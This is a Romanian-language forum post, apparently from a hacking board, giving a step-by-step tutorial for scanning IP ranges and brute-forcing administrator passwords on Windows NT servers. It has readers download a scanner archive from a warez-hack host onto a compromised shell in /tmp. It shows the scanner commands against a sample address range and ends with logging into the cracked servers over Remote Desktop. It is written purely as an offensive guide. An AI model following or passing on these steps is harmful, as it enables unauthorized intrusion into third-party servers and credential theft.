Jump to content
mario23

TUTORIAL CUM SA SCANEZI SERVERE DE WInDoWoS NT

Recommended Posts

Posted

Scurt si la obiect am sa fiu :

In primul rand ai nevoie de 3 lucruri pentru a incepe :

-1. Un shell sau un root fara firewall activat si restrictii la rulare.

-2. Un scaner bruteforce pe unu din porturile 8, 16, sau cel mai bun 24.

-3. Mult noroc si rabdare ca este cam greu de nimerit o clasa de IP buna, de Servere pe WIN...

ACUM sa le luam pe rand

primu lucru este rootu sau shellul pe care trebuie sa ti-l faci rost singur.

al doilea ar fi scaneru de Nt_uri pe care am sa vi-l pun eu la dispozitie.

? linkul: http://www.warez-hack.ws43.com/arhiva/nt.tar

restul vine de la sine :D

Acum sa inceapa scanarea:

pentru incepatori sau cei care nu stiu comenzile UNIX:

esti pe root, acum cauti un director (cel mai bun dir este /tmp) unde sa poti copia si scrie fara restrictii in cazul in care nu esti root si trebuie sa copiezi scaneru: dai comenzile urmatoare:

cd /tmp |explicatie //schimbi directoru in care esti;

"wget" //aici pui linkul de mai jos fara " "

"http://warez-hack.ws43.com/arhiva/nt.tar"

| explicatie //copiezi arhiva de scan de pe host in root

tar xfv nt.tar; daca iti da eroare incearca asa; tar xzfv nt.tar |explicatie //dezarhivezi arhiva

cd fb | explicatie //iintri in dir scanerului

Acum ai 2 moduri de a folosi scaneru:

I. VIZIBIL adica vezi cum scaneaza IP cu IP si atunci cand gaseste un IP bun cum incearca toate parolele din dictionar pentru a sparge parola administratorului

II. Silentios adica Invizibil

prima metoda va arata cam asa :

[root@localhost tmp]#./f -h 66.152.33.0/24 -p pass -t 3 -c 30 -o log -v -d -k -C

a doua metoda :

[root@localhost tmp]#./s 66.152.33.0/24 {66.152.33.0 este raza de IP pe care vrei sa scanezi de la 66.152.33.0 ==> 66.152.33.255}

In cazul in care esti norocos si ai prins un NT il gasesti in "log", in cazul in care nu ai fost pe faza cand ti la afisat pe ecran.

il afisezi din nou cu urmatoarea comanda: cat log

Acum daca ai fost norocos si ai avut rabdare, ai un server PE WIN NT si trebui sa te conectezi pe el.

CUM ?

- Simplu. Daca ai Windows XP te duci la start menu si apesi pe run. Scrii in casuta de run: mstsc.exe si dai ok.

Acum in programul de Remote unde scrie computer bagi IP de l-ai gasit la scan si dai connect.

Astepti sa se conectezi si iti apare pagina de login a serverului. Acolo bagi userul pe care l-ai gasit la scan ex"Administrator" si la password ex"PASWW".

Cam asta e tot. Scurt si la obiect. CE poti sa faci cu un server de NT trebuie sa descoperi singur.

DACA am uitat ceva pentru cine nu intelege sa intrebe.

Imi asum drepturile de autor pe acest tutorial; nu stiu daca s-a mai scris asa ceva pana acum, cel putin eu unu nu am vazut.Daca era nu il mai faceam.